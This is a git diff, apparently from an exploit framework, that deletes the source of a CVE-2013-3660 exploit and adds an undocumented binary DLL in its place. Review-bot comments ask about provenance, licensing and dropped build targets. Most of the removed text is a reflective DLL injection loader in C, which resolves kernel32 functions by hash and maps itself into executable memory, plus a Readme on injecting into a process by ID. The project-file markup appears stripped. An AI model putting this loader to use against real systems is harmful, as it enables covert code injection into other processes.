diff --git a/data/exploits/cve-2013-3660/exploit.dll b/data/exploits/cve-2013-3660/exploit.dll
deleted file mode 100755
index cbb761b568..0000000000
Binary files a/data/exploits/cve-2013-3660/exploit.dll and /dev/null differ
diff --git a/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll b/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll
new file mode 100755
index 0000000000..888d31339a
Binary files /dev/null and b/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll differ
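Review bot: the replacement binary data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll is added with no source or build instructions, while the same change deletes the external/source/exploits/cve-2013-3660 files that produced the old exploit.dll. Nothing left in this diff says where ppr_flatten_rec.x86.dll is built from or how to reproduce it; the commit message (or a short README beside the binary) should point at the source that generated it so the shipped DLL stays auditable and rebuildable.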
diff --git a/external/source/exploits/cve-2013-3660/LICENSE.txt b/external/source/exploits/cve-2013-3660/LICENSE.txt
deleted file mode 100755
index f217025f51..0000000000
--- a/external/source/exploits/cve-2013-3660/LICENSE.txt
+++ /dev/null
@@ -1,25 +0,0 @@
-Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification, are permitted
-provided that the following conditions are met:
-
- * Redistributions of source code must retain the above copyright notice, this list of
-conditions and the following disclaimer.
-
- * Redistributions in binary form must reproduce the above copyright notice, this list of
-conditions and the following disclaimer in the documentation and/or other materials provided
-with the distribution.
-
- * Neither the name of Harmony Security nor the names of its contributors may be used to
-endorse or promote products derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
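Review bot: deleting LICENSE.txt removes the only copy of the 3-clause BSD terms that the Readme refers to, and the clause "Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution" still applies to any DLL built from Stephen Fewer's loader. If ppr_flatten_rec.x86.dll is derived from this code, keep the notice somewhere in the tree (for example next to the binary) instead of dropping it together with the source.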
diff --git a/external/source/exploits/cve-2013-3660/Readme.md b/external/source/exploits/cve-2013-3660/Readme.md
deleted file mode 100755
index 8670897457..0000000000
--- a/external/source/exploits/cve-2013-3660/Readme.md
+++ /dev/null
@@ -1,71 +0,0 @@
-About
-=====
-
-Reflective DLL injection is a library injection technique in which the concept
-of reflective programming is employed to perform the loading of a library from
-memory into a host process. As such the library is responsible for loading
-itself by implementing a minimal Portable Executable (PE) file loader. It can
-then govern, with minimal interaction with the host system and process, how it
-will load and interact with the host.
-
-Injection works from Windows NT4 up to and including Windows 8, running on x86,
-x64 and ARM where applicable.
-
-Overview
-========
-
-The process of remotely injecting a library into a process is two fold. Firstly,
-the library you wish to inject must be written into the address space of the
-target process (Herein referred to as the host process). Secondly the library
-must be loaded into that host process in such a way that the library's run time
-expectations are met, such as resolving its imports or relocating it to a
-suitable location in memory.
-
-Assuming we have code execution in the host process and the library we wish to
-inject has been written into an arbitrary location of memory in the host
-process, Reflective DLL Injection works as follows.
-
-* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap
-shellcode, to the library's ReflectiveLoader function which is an exported
-function found in the library's export table.
-* As the library's image will currently exists in an arbitrary location in
-memory the ReflectiveLoader will first calculate its own image's current
-location in memory so as to be able to parse its own headers for use later on.
-* The ReflectiveLoader will then parse the host processes kernel32.dll export
-table in order to calculate the addresses of three functions required by the
-loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
-* The ReflectiveLoader will now allocate a continuous region of memory into
-which it will proceed to load its own image. The location is not important as
-the loader will correctly relocate the image later on.
-The library's headers and sections are loaded into their new locations in
-memory.
-* The ReflectiveLoader will then process the newly loaded copy of its image's
-import table, loading any additional library's and resolving their respective
-imported function addresses.
-* The ReflectiveLoader will then process the newly loaded copy of its image's
-relocation table.
-* The ReflectiveLoader will then call its newly loaded image's entry point
-function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully
-loaded into memory.
-* Finally the ReflectiveLoader will return execution to the initial bootstrap
-shellcode which called it, or if it was called via CreateRemoteThread, the
-thread will terminate.
-
-Build
-=====
-
-Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release
-mode to make inject.exe and reflective_dll.dll
-
-Usage
-=====
-
-To test use the inject.exe to inject reflective_dll.dll into a host process via
-a process id, e.g.:
-
-> inject.exe 1234
-
-License
-=======
-
-Licensed under a 3 clause BSD license, please see LICENSE.txt for details.
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln b/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln
deleted file mode 100755
index eff992d77c..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln
+++ /dev/null
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Release|Win32 = Release|Win32
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj
deleted file mode 100755
index 33c6bd9515..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj
+++ /dev/null
@@ -1,357 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
deleted file mode 100755
index ed6cacb681..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
+++ /dev/null
@@ -1,266 +0,0 @@
-
-
-
-
- Debug
- ARM
-
-
- Debug
- Win32
-
-
- Debug
- x64
-
-
- Release
- ARM
-
-
- Release
- Win32
-
-
- Release
- x64
-
-
-
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}
- reflective_dll
- Win32Proj
-
-
-
- DynamicLibrary
- v100
- MultiByte
- true
-
-
- DynamicLibrary
- v110
- MultiByte
- true
-
-
- DynamicLibrary
- v110
- Unicode
-
-
- DynamicLibrary
- v110
- Unicode
-
-
- DynamicLibrary
- v110
- MultiByte
- false
-
-
- DynamicLibrary
- v110
- Unicode
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- <_ProjectFileVersion>11.0.50727.1
-
-
- $(SolutionDir)$(Configuration)\
- $(Configuration)\
- true
-
-
- true
-
-
- $(SolutionDir)$(Platform)\$(Configuration)\
- $(Platform)\$(Configuration)\
- true
-
-
- $(SolutionDir)$(Configuration)\
- $(Configuration)\
- false
- exploit
-
-
- false
-
-
- $(SolutionDir)$(Platform)\$(Configuration)\
- $(Platform)\$(Configuration)\
- false
-
-
-
- Disabled
- WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
- Level3
- EditAndContinue
-
-
- true
- Windows
- MachineX86
-
-
-
-
- Disabled
- WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
-
- Level3
- EditAndContinue
-
-
- true
- Windows
-
-
-
-
- X64
-
-
- Disabled
- WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
- Level3
- ProgramDatabase
-
-
- true
- Windows
- MachineX64
-
-
-
-
- MaxSpeed
- OnlyExplicitInline
- true
- WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
- Level3
- ProgramDatabase
-
-
- true
- Windows
- true
- true
- MachineX86
-
-
-
-
-
-
-
-
- MinSpace
- OnlyExplicitInline
- true
- WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
-
- Level3
- ProgramDatabase
- true
- Default
-
-
- true
- Windows
- true
- true
- $(OutDir)$(ProjectName).arm.dll
-
-
- copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\
-
-
-
-
- X64
-
-
- MaxSpeed
- OnlyExplicitInline
- true
- Size
- false
- WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
- Level3
- ProgramDatabase
- CompileAsCpp
-
-
- $(OutDir)$(ProjectName).x64.dll
- true
- Windows
- true
- true
- MachineX64
-
-
- copy $(OutDir)$(ProjectName).x64.dll ..\bin\
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
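Review bot: this project defined Release builds for Win32 (target name "exploit", matching the deleted exploit.dll), x64 ($(OutDir)$(ProjectName).x64.dll) and ARM ($(OutDir)$(ProjectName).arm.dll), each with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN defined. Only an x86 binary (ppr_flatten_rec.x86.dll) replaces it, so the x64 and ARM targets are dropped without mention; confirm that is intentional and say so in the commit message.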
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters
deleted file mode 100755
index 15f7cbf646..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters
+++ /dev/null
@@ -1,32 +0,0 @@
-
-
-
-
- {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
- cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
-
-
- {93995380-89BD-4b04-88EB-625FBE52EBFB}
- h;hpp;hxx;hm;inl;inc;xsd
-
-
-
-
- Source Files
-
-
- Source Files
-
-
-
-
- Header Files
-
-
- Header Files
-
-
- Header Files
-
-
-
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h
deleted file mode 100755
index 5738497f5b..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h
+++ /dev/null
@@ -1,51 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-
-// we declare some common stuff in here...
-
-#define DLL_QUERY_HMODULE 6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT __declspec( dllexport )
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c
deleted file mode 100755
index 594c0b8066..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c
+++ /dev/null
@@ -1,496 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "ReflectiveLoader.h"
-//===============================================================================================//
-// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
-HINSTANCE hAppInstance = NULL;
-//===============================================================================================//
-#pragma intrinsic( _ReturnAddress )
-// This function can not be inlined by the compiler or we will not get the address we expect. Ideally
-// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of
-// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics
-// available (and no inline asm available under x64).
-__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
-//===============================================================================================//
-
-// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
-// otherwise the DllMain at the end of this file will be used.
-
-// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
-// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
-
-// This is our position independent reflective DLL loader/injector
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
-#else
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
-#endif
-{
- // the functions we need
- LOADLIBRARYA pLoadLibraryA = NULL;
- GETPROCADDRESS pGetProcAddress = NULL;
- VIRTUALALLOC pVirtualAlloc = NULL;
- NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
-
- USHORT usCounter;
-
- // the initial location of this image in memory
- ULONG_PTR uiLibraryAddress;
- // the kernels base address and later this images newly loaded base address
- ULONG_PTR uiBaseAddress;
-
- // variables for processing the kernels export table
- ULONG_PTR uiAddressArray;
- ULONG_PTR uiNameArray;
- ULONG_PTR uiExportDir;
- ULONG_PTR uiNameOrdinals;
- DWORD dwHashValue;
-
- // variables for loading this image
- ULONG_PTR uiHeaderValue;
- ULONG_PTR uiValueA;
- ULONG_PTR uiValueB;
- ULONG_PTR uiValueC;
- ULONG_PTR uiValueD;
- ULONG_PTR uiValueE;
-
- // STEP 0: calculate our images current base address
-
- // we will start searching backwards from our callers return address.
- uiLibraryAddress = caller();
-
- // loop through memory backwards searching for our images base address
- // we dont need SEH style search as we shouldnt generate any access violations with this
- while( TRUE )
- {
- if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
- {
- uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
- // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
- // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
- if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
- {
- uiHeaderValue += uiLibraryAddress;
- // break if we have found a valid MZ/PE header
- if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
- break;
- }
- }
- uiLibraryAddress--;
- }
-
- // STEP 1: process the kernels exports for the functions our loader needs...
-
- // get the Process Enviroment Block
-#ifdef WIN_X64
- uiBaseAddress = __readgsqword( 0x60 );
-#else
-#ifdef WIN_X86
- uiBaseAddress = __readfsdword( 0x30 );
-#else WIN_ARM
- uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
-#endif
-#endif
-
- // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
- uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
-
- // get the first entry of the InMemoryOrder module list
- uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
- while( uiValueA )
- {
- // get pointer to current modules name (unicode string)
- uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
- // set bCounter to the length for the loop
- usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
- // clear uiValueC which will store the hash of the module name
- uiValueC = 0;
-
- // compute the hash of the module name...
- do
- {
- uiValueC = ror( (DWORD)uiValueC );
- // normalize to uppercase if the madule name is in lowercase
- if( *((BYTE *)uiValueB) >= 'a' )
- uiValueC += *((BYTE *)uiValueB) - 0x20;
- else
- uiValueC += *((BYTE *)uiValueB);
- uiValueB++;
- } while( --usCounter );
-
- // compare the hash with that of kernel32.dll
- if( (DWORD)uiValueC == KERNEL32DLL_HASH )
- {
- // get this modules base address
- uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
-
- // get the VA of the modules NT Header
- uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
- // uiNameArray = the address of the modules export directory entry
- uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the VA of the export directory
- uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
- // get the VA for the array of name pointers
- uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-
- // get the VA for the array of name ordinals
- uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
- usCounter = 3;
-
- // loop while we still have imports to find
- while( usCounter > 0 )
- {
- // compute the hash values for this function name
- dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
-
- // if we have found a function we want we get its virtual address
- if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
- {
- // get the VA for the array of addresses
- uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
- // use this functions name ordinal as an index into the array of name pointers
- uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
- // store this functions VA
- if( dwHashValue == LOADLIBRARYA_HASH )
- pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
- else if( dwHashValue == GETPROCADDRESS_HASH )
- pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
- else if( dwHashValue == VIRTUALALLOC_HASH )
- pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-
- // decrement our counter
- usCounter--;
- }
-
- // get the next exported function name
- uiNameArray += sizeof(DWORD);
-
- // get the next exported function name ordinal
- uiNameOrdinals += sizeof(WORD);
- }
- }
- else if( (DWORD)uiValueC == NTDLLDLL_HASH )
- {
- // get this modules base address
- uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
-
- // get the VA of the modules NT Header
- uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
- // uiNameArray = the address of the modules export directory entry
- uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the VA of the export directory
- uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
- // get the VA for the array of name pointers
- uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
-
- // get the VA for the array of name ordinals
- uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
-
- usCounter = 1;
-
- // loop while we still have imports to find
- while( usCounter > 0 )
- {
- // compute the hash values for this function name
- dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
-
- // if we have found a function we want we get its virtual address
- if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
- {
- // get the VA for the array of addresses
- uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
- // use this functions name ordinal as an index into the array of name pointers
- uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
- // store this functions VA
- if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
- pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-
- // decrement our counter
- usCounter--;
- }
-
- // get the next exported function name
- uiNameArray += sizeof(DWORD);
-
- // get the next exported function name ordinal
- uiNameOrdinals += sizeof(WORD);
- }
- }
-
- // we stop searching when we have found everything we need.
- if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache )
- break;
-
- // get the next entry
- uiValueA = DEREF( uiValueA );
- }
-
- // STEP 2: load our image into a new permanent location in memory...
-
- // get the VA of the NT Header for the PE to be loaded
- uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
- // allocate all the memory for the DLL to be loaded into. we can load at any address because we will
- // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
- uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
-
- // we must now copy over the headers
- uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
- uiValueB = uiLibraryAddress;
- uiValueC = uiBaseAddress;
-
- while( uiValueA-- )
- *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
-
- // STEP 3: load in all of our sections...
-
- // uiValueA = the VA of the first section
- uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
-
- // itterate through all sections, loading them into memory.
- uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
- while( uiValueE-- )
- {
- // uiValueB is the VA for this section
- uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
-
- // uiValueC if the VA for this sections data
- uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
-
- // copy the section over
- uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
-
- while( uiValueD-- )
- *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
-
- // get the VA of the next section
- uiValueA += sizeof( IMAGE_SECTION_HEADER );
- }
-
- // STEP 4: process our images import table...
-
- // uiValueB = the address of the import directory
- uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
-
- // we assume their is an import table to process
- // uiValueC is the first entry in the import table
- uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
- // itterate through all imports
- while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
- {
- // use LoadLibraryA to load the imported module into memory
- uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
-
- // uiValueD = VA of the OriginalFirstThunk
- uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
-
- // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
- uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
-
- // itterate through all imported functions, importing by ordinal if no name present
- while( DEREF(uiValueA) )
- {
- // sanity check uiValueD as some compilers only import by FirstThunk
